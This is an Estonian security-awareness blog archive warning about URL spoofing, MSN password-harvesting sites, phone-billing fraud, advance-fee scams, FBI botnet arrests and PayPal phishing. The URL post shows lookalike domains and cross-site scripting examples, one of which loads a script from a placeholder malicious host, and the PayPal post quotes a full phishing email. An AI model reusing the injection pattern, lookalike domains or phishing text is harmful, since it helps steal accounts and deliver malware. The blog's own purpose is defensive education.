themes theme jeux izle-videolar ruya tabirleri logohaberleri sinema ruya

Artiklid alates ‘Pettused’ rubriigist

URL-ide võltsimine

15. aprill 2008

Internetiaadressi ehk URL-i võltsimine on üha laiemalt leviv kaval võte, mille abil pahategijad suunavad arvutikasutajaid pahatahtlikele lehekülgedele, lasevad neil alla laadida viiruseid ja muud pahavara või siis varastavad paroole ja muud väärtuslikku infot.

Igale dokumendil või muul ressursil on Internetis oma unikaalne aadress, URL. Kui soovitakse pöörduda mingi veebilehe poole, siis kirjutatakse URL veebilehitseja aadressilahtrisse. URL’id sisalduvad ka veebilehtedes, kus nad kujutavad endast hüpertekstlinke teistele veebilehtedele.

Internetiaadressi esimene osa näitab ära kasutatava protokolli (näit. HTTP), sellele järgneb domeeninimi, alamkataloogi nimi ja failinimi. Veebisaidi avalehe poole pöördumiseks on vaja ainult protokolli- ja domeeninime.

Kuidas siis internetilehekülgi võltsitakse?

Esimene tehnika:

Võtame ühe lehekülje, mis näeb välja nagu Yahoo! pärislehekülje aadress (www.yahoo.com):

http://www.yahoo550.com/image/logo.jpg?queryid=77092

URL-i algus sarnaneks nagu Yahoo! omaga (yahoo500.com), kuid tegelikult ei ole sel päris-Yahooga midagi pistmist. See lehekülg võib küll paista näiteks Yahoo! ühe teenuslehekülje, http://360.yahoo.com/ sarnane, aga tegelikult ei ole see Yahoo! vallatav lehekülg.

Küll aga kuulub Yahoo!-le näiteks http://travel.yahoo.com/. Yahoo on domeen ja travel alamdomeen, mõlemit haldab päris Yahoo!

Selle võltsimistehnika puhul kasutatakse ära tavakasutajate pealiskaudsust – enamik ei ole harjunud URL-e kuigi tähelepanelikult jälgima ning neile piisab, kui nad URL-i nimes kasvõi mõne tuttava elemendi ära tunnevad.

Teine tehnika:

Veidi tähelepanelikumate ohvrite lollitamiseks asendatakse URL-i nimes üks või osa tähti sarnaste, kuid tegelikult erinevate tähtede/numbritega. Näiteks www.hot.ee võib olla ka www.ho7.ee.

Tavalised asendused on näiteks “i” -> “I”, “O” -> “0” või siis ka “1” -> “I”. Võib olla ka juhtumeid, kus teil palutakse kohe sisse logida leheküljele www.ma1l.ee, sest vastasel juhul kustutatakse teie kirjad või konto. Tekst on, nagu ikka, inglise keeles, näiteks: “Log in with your email account quickly, otherwise it will be deleted!

Kolmas tehnika:

Eriti kahtlased on näiteks e-kirja või Messengeri sõnumiga saadetud pikad ja segased URL-id, mille lõpus on .exe laiendiga fail, näiteks http://216.12.204.2/…./scfl.exe. Niisugusel juhul võib tegemist olla viirusega, mis installib end automaatselt teie arvutisse. Õnneks hoiatab vähegi turvaline brauser teid alati, kui üritate mõnd niisugust URL-i avada.

Neljas tehnika:

Võltsitud URL-le lisatakse skript, mis üritab läbi veebisirvja turvaaugu saada kontrolli arvuti üle. Kui ohver on veebilehitsejal skriptid lubanud (ja enamasti see vaikimisi nii ka on), siis võib veebilehe lähtekoodis näha midagi niisugust:

Hello message board. This is a message.

<SCRIPT>jupp pahatahtlikku koodi</SCRIPT>

This is the end of my message.

Samuti võib kohata sellist 2-st URL-st koosnevat teksti

<A href=”http://example.com/comment.cgi? mycomment=<SCRIPT src=’http://kuriveeb/pahavara’></SCRIPT>”>Vajuta siia</A>

<A href=”http://example.com/comment.cgi? mycomment=<SCRIPT>jupp pahatahtlikku koodi</SCRIPT>”> Vajuta siia</A>

Esimeses koodijupis on skriptis selgesõnaliselt endaga ühenduv kood, mis saab siis faile või juhiseid viidatud internetileheküljelt. Teises koodijupis on viite taga lihtsalt pahatahtlik kood, mida saab end käivitada läbi veebisirvija turvaaugu.

Mida skriptid teevad?

Kui kasutaja on külastanud pahatahtlike skriptidega lehekülgi, siis halvemal juhul saab ründaja ohvri arvuti üle täieliku kontroll – eriti juhul, kui surfaja kasutab vananenud ja turvaparandusteta veebisirvijat. Ründaja näeb, mis rünnatavas arvutis parasjagu toimub, milliseid lehekülgi on kasutaja külastanud enne ja pärast skriptiga pihtasaamist, ta võib uurida kasutaja salvestatud paroolide loendit ning koguni paigaldada arvutisse täiendavat pahavara. Seda kõike siis, nagu eelpool öeldud, vananenud ja turvaparandusteta brauseri ja opsüsteemi puhul – näiteks kui kasutate veebi sirvimiseks veel Internet Exploreri versiooni 6…

Kui ründajal õnnestub sisse murda veebiserverisse, siis saab ta laadida skripti üles ka serveri hallatavale koduleheküljele. Näiteks www.rooli.ee-ga oli hiljuti selline lugu.

Niimoodi saab skripti laiali saata väga suurele hulgale surfajatele ning sellega kontrollida juba väga suurt hulka arvuteid.

Kuidas liba-URL-id levivad?

Üheks peamiseks nende leviku allikaks on spämm.  Võltsitud URL-e võidakse saata ka Messengeri või Skype’i vestlusaknasse, neid võidakse istutada foorumi- ja blogipostitustesse või siis, nagu eelnevalt öeldud, kräkitud kodulehekülgedele.

Pikemalt saab URL-ide võltsimisest lugeda CA turvablogist.

Veel üks Messengeri uss

17. märts 2008

Vahepeal on jalad kõhu alt välja ajanud ka vana teenus, mis lubab kindlaks teha, kes on sind oma MSN-is ära blokeerinud.
http://whoblocksyou.net/ on Järjekorde MSN-i teel reklaamitav kontokaaperdamise leht.
Olles sisestanud sellel lehel oma MSN-i kasutajanime ja parooli, muudetakse sinu ekraaninimi selliseks: http://whoblocksyou.net/ find …
Minu MSN-is olev sõber vähemasti minule seda linki ise ei saatnud, link oli ainult tema pealkirjas kajastatud.
Soovitan tungivalt hoida oma MSNi parooli enda teada ja mitte avaldada seda kolmandatele lehtedele ja isikutele.

Telefoniga saab virtaalmaailmast raha

14. veebruar 2008

Eesti Päevaleht kirjeldab järgmist juhtumit. Nimelt pöördus ühe firma kontorisse naine, kes palus seoses hädaolukorraga luba telefoni kasutada.

Väidetavalt üksikule vanainimesele helistada proovinud keskealine ja korralikult riides viisakas naisterahvas ei äratanud töötajates esmapilgul mingit kahtlust. “Ta võttis küll mitu kõnet ja ütles iga kord, et ühenduse saamine ebaõnnestus, aga keegi meist ei näinud põhjust tema sõnades kahelda,” ütles üks pealtnägijaist.
Tegelikult helistas petis kümme korda rate.ee rahalaadimise numbrile. Alles hiljem telefoniarvel näpuga järge ajades tuvastati, et sel moel oli naisel õnnestunud paari minuti jooksul tekitada ettevõttele ligi 1000-kroonine telefoniarve.
Netiportaali rate.ee kontole on võimalik telefonitsi kanda portaalisisesteks toiminguteks mõeldud valuutat ehk SOL-i. Paralleelselt portaalisiseste tegevustega on rate.ee-s ringlevat virtuaalset raha võimalik hiljem ka Eesti kroonideks konverteerida ja sularahas välja võtta. Rate.ee kontole saab ühekorraga raha kanda 25–100 krooni, seetõttu helistaski kelm korduvalt kallile teenusenumbrile.

Põhja prefektuuri majanduskuritegude talituse vanemkomissar Rocco Ots lausus, et neile on eespool kirjeldatuga samasuguseid juhtumeid teada üle kümne. Hulganisti kaebusi laekus jaanuari teises pooles, kõnesid on tehtud nii firmadest kui ka era-isikute korteritest. Tõenäoliselt on kannatanuid rohkemgi, kuid kõigil firmadel ei pruugi olla tellitud kõneeristust ning suuremates ettevõtetes ei pälvi mõnesajast kuni tuhande kroonini küündiv arve teiste seas kuigivõrd tähelepanu. Segaduste vältimiseks soovitab Rocco Ots telefoni omanikel hoolitseda ise soovitud numbri valimise eest ja alles seejärel ulatada toru abipalujale.

Siinkohal tuleb nüüd rõhutada, et rate.ee pole sugugi ainus sotsiaalne keskkond, milles ka reaalset raha saab liigutada – näiteks Second Life’i virtuaalmaailmas võivad liikuda päris suured summad. Sellegippolest on põhjust karta, et sarnaseid pettusi hakatakse ka Eestis järjest rohkem toime panema.

Omaette probleem on helistamispahavara, mis samuti võib tasulistele numbritele helistades teie arvelt reaalset raha viia. Seega võib viirustõrje olla abiks ka telefonipettuste puhuks.

Arvutikaitse ABC

12. veebruar 2008

arvutikaitse_abc_esikaas.jpgSee on väga hea ja asjakohane raamat. Mina kirjutasin selle 🙂

Tähendasin seal üles enamlevinud pahavara iseloomustused ning mõningad võtted, kuidas end internetiohtude vastu kaitsta. Üritasin vältida akadeemilist soliidsust ning lugeja koormamist tehniliste detailidega, nii et seda peaksid julgema kätte võtta ka need, kes end arvutiasjanduses väga kodus ei tunne.

Kõik nähtused on rühmitatud eraldi peatükkidesse ja esitatud tähestiku järjekorras. Kaanest kaaneni järjest läbilugemine ei ole kohustuslik, kavalam on leida registrist huvipakkuv märksõna ja lugeda konkreetset peatükki. Jah, paberil ei saa ikka nii mugavalt linkida kui internetis…

Irja Ahi tegi “Arvutikaitse ABC”-le võrratud ja vaimukad illustratsioonid, Sverre Lasn ägeda kujunduse. Väljaandmise korraldas sihtasutus Vaata Maailma, rahaliselt toetasid Hansapank, SEB, Elion ja EMT.

Esitlus on täna, 12.02 kell 14 Viru Keskuse Rahva Raamatu esitlussaalis. Osta saab esialgu Rahva Raamatust, kui trükikoda ülejäänud tiraaži valmis saab, siis ka Apollost ja mujalt.

Kas need kirjad on seotud petuskeemiga?

17. jaanuar 2008

Anneli küsib: kas me sellistele kirjadele peaks kah vastama?

irishlottery.jpg

scotlandlottery.jpg

Jah, tegemist on tüüpilise petuskeemiga, millega üritatakse teilt arve avamise ja rahaülekande kulude näol raha ja isikuandmeid välja petta. Niisugustele kirjadele ei ole vaja vastata, samuti ei ole neid vaja ka kellelegi edasi saata.

Parim, mida te teha saate, on need ilma avamata kustutada. Säästate nii iseenda kui ka oma sõprade/IT spetsialistide aega ja närve.

Klassika – Aafrika sõjapõgenike hiigelpärandus

7. detsember 2007

nigeria.JPG

Riigiprokuratuuri teatel on viimasel ajal hakanud internetis levima petukirjad, milles palutakse osaleda Aafrikas elava «sõjapõgeniku» miljonitesse USA dollaritesse ulatuva päranduse kättesaamisel, lubades vastutasuks abistamise eest osa pärandusest.

Mina sain esimese seesuguse elektronkirja juba 9 aastat tagasi, paberkujul liikusid need veelgi varem. Mõned kohalikud ärimehedki jäid suurt raha lubavaid kirju uskuma, lendasid kohapeale, jäid kogu kaasavõetud rahast ilma ja olid veel õnnelikud, et vähemalt elunatuke alles jäi.

Tookord ammu, 1998. aastal olid kirjad muidugi märksa kõrgelennulisemad – jutt käis ikka Aafrika eksdikdaatorite Mobutu Sese Seko ja Samora Macheli miljonitese, mõnikord koguni miljarditesse dollaritesse ulatuvast pärandusest. Personaalselt mulle lubati sellest 4 milli puhtalt kätte 🙂
Tookord viitsisin ka saatja aadressi jälitada. Kirjad olid küll postitatud Yahoo veebimeili kaudu, kuid pisike kaevamistöö viis mind ühe Nigeeria suurima linna Lagose ärikeskuse võrgusõlmeni. Kerge taustauuring aga näitas, et selliseid petukirju vorbiti juba tollal enam-vähem samade Å¡abloonide järgi massiliselt – keegi oskajam tegelane kirjutas teksti valmis ning ülejäänud paljundasid seda siis oma nime alt. Seega enam-vähem sama tööjaotus mis praegugi. Ainus, mis sealjuures kergelt hämmastama paneb, on see, et ikka veel leidub neid, kes sihukeste klassikaliste hanitustega oma rahast ilma oskavad jääda.

Meeldetuletuseks ka üks galerii kõikvõimalikest päranduse- ja muu raha jagajatest.

FBI operatsioon Bot Roast

30. november 2007

botnet.jpgFBI tegi kokkuvõtte arvutizombistajate vastu suunatud operatsiooni Bot Roast teisest faasist, mille käigus

  • tehti kahjutuks Philadelfia piirkonna ülikoole DDoS-iga pommitanud botnet,
  • mõisteti süüdi kaks botnetipidajat, kellest üks oli küberallilmas laialt tuntud kalifornialane,
  • karistati veel kolme botnetipidajat, kellest kaks suutsid Kesk-Lääne pankade vastu suunatud õngitsemisskeemiga riisuda miljoneid dollareid,
  • koostöös Uus-Meremaa politseiga tabati ülemaailmset botnetti juhtinud 18-aastane noor arvutigeenius hüüdnimega AKILL.

Kokku olid FBI tabatud kurjamid suutnud tekitada 20 miljoni $ ulatuses kahju, näiteks ühel konkreetsel juhul kaotas üks DDoS-rünnaku ohver 20 000 $.

Täpsemat jäid vahele:

21-aastane Ryan Brett Goldstein Pennsylvaniast, kes ründas botnetiga oma kodukandi ülikoole,
27-aastane Adam Sweaney Tacomast, kes lõi spämmkirjade vahendusel levitatud troojalaste abil botneti ja üüris seda soovijaile,
Robert Matthew Floridast, kes proges botnettide loomiseks tarvilikku reklaam- ja muud pahavara,
38-aastane Aleksandr DimitrievitÅ¡ Paskalov, kes sai 42 kuud vanglat õngitsemisskeemide loomise eest,
21-aastane floridalane Azizbek Tahiri poeg Mamadjanov – saadeti kaheks aastaks istuma koostöö eest Paskaloviga nendesamade õngitssemisskeemide kasutamise eest,
26-aastane John Schiefer Los Angelesest – väidetavalt esimene, kes mõisteti süüdi uue föderaalseaduse alusel paroolide ja kasutajanimede salvestamise ja nende väärkasutamise eest,
21-aastane kalifornialane Gregory King nelja arvutisse sissemurdmise eest. Kingi on varem karistatud DDoS-rünnakute eest, millest üks oli näiteks suunatud õngitsemise ja pahavaraga võitleva firma vastu.
24-aastane Jason Michael Downey Kentuckyst – sai aasta türmi peamiselt IRC serverite vastu suunatud rünnakute eest, kusjuures tegelikult kannatasid ka samades serverites käitatavad muud teenused.

Lisaks, nagu öeldud, võeti sel nädalal rajalt maha ka kodanik AKILL (kelle pärisnime tema alaealisuse tõttu ei avaldata) ja tema juhtud 1,3 miljonist zombiarvutist koosnev botnet. AKILL-i ähvardab kuni 10-aastane vanglakaristus.

Bot Roast’i esimeses faasis vabastati botipidajate haardest miljon zombiarvutit.

Clicktoforyou möllab MSN-is

27. november 2007

Viimasel ajal on väga paljudel MSNi kasutajatel hakanud oma kontaktlisti liikmetelt tulema teateid, kus palutakse avada www.clicktoforyou.com, mis suunab lehele www.blockdelete.com:

clicktoforyou.jpg

Avatud leheküljel palutakse sisestada oma MSN-i kasutajanimi ja parool. Peale seda siseneb teenus sinu MSN-i kasutajakontosse ja asub iseenaast levitama.

Selle vastu aitab vaid see, kui vahetada oma MSN-i parool ära. Viirusega just tegu pole, küll aga väikese vargusega.

Lähemalt saab lugeda Microsofti foorumist (ingliskeelne).

Õngitsejad on visad

27. november 2007

Eelmisele lisaks tuli nüüd veel seesugune ähvardus:

paypal2.jpg

Toodud link suunab ikka sellelesamale PayPal’i omaga väga sarnasele libasaidile.

PayPal’i kontode omanikud, ettevaatust!

24. november 2007

paypal.jpgViimastel päevadel on liikvel selline spämm, milles kästakse kustutamise ähvardusel uuendada oma PayPal’i konto infot:

From: PayPaI [mailto:accounts@paypaI.com]
Sent: Thursday, November 22, 2007 11:23 PM
To: undisclosed-recipients:
Subject: Please renew your PayPal Online Account!
Importance: High

Dear PayPal Member,

This is your official notification from Paypal Management that the service listed below will be deactivated and deleted if not renewed immediately. Previous notifications have been sent to the Billing Contact assigned to this account. As the Primary Contact, you must renew the service listed below or it will be deactivated and deleted.
Renew Now (
link võltssaidile) your PayPal Online Account
SERVICE: PayPal Online Account Renew
EXPIRATION: November, 30 2007
Thank you for using PayPal.
We appreciate your business and the opportunity to serve you.
PayPal Management.

Please do not reply to this message. For any inquiries, contact Paypal Management .
Copyright © 1999-2007 PayPal. All rights reserved.

Uuendamislinki vajutades juhitakse kasutaja leheküljele, mis on küll äravahetamiseni sarnane PayPal’i konto sisselogimisaknaga, kuid mida isegi minu Mozilla iseloomustab kui “Võltsitud lehekülge, mille eesmärgiks on välja petta isiku- või finantsandmeid”.

Lisaks on spämmi saatjaks mitte PayPal.com, vaid PayPaI.com. Pisike, aga oluline vahe 🙂